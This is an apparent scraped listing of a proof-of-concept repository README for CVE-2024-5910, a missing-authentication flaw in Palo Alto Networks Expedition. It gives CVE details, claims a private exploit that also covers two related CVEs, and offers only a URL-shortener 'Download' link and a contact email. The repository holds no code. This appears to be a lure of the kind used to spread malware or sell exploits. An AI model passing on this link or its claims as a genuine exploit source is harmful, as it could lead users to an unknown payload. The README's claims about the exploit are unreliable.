CVE-2024-5910 PoC — Expedition: Missing Authentication Leads to Admin Account Takeover

Source

Associated Vulnerability

Readme

# CVE-2024-5910: Missing Authentication for Critical Function

## Overview

CVE-2024-5910 is a critical vulnerability in Palo Alto Networks Expedition versions before 1.2.92 that allows unauthenticated attackers with network access to gain control of an Expedition administrator account.

## Details
+ CVE ID: CVE-2024-5910
+ Impact: Critical
+ Exploit Availability: Not public, only private.
+ CVSS: 9.3

## Exploit
[Download](https://ur0.jp/fi4Zd)

also including CVE-2024-9464, CVE-2024-9465.

![image (1)](https://github.com/user-attachments/assets/3263f13b-f449-4b04-92cc-db0ddfea6eb6)

## Contact
For inquiries, please contact zetraxz@thesecure.biz

File Snapshot

 [4.0K]  /data/pocs/68717fa128c6a83babeb4261e7b6b2f2eaca19bd
└── [ 655]  README.md

0 directories, 1 file

Remarks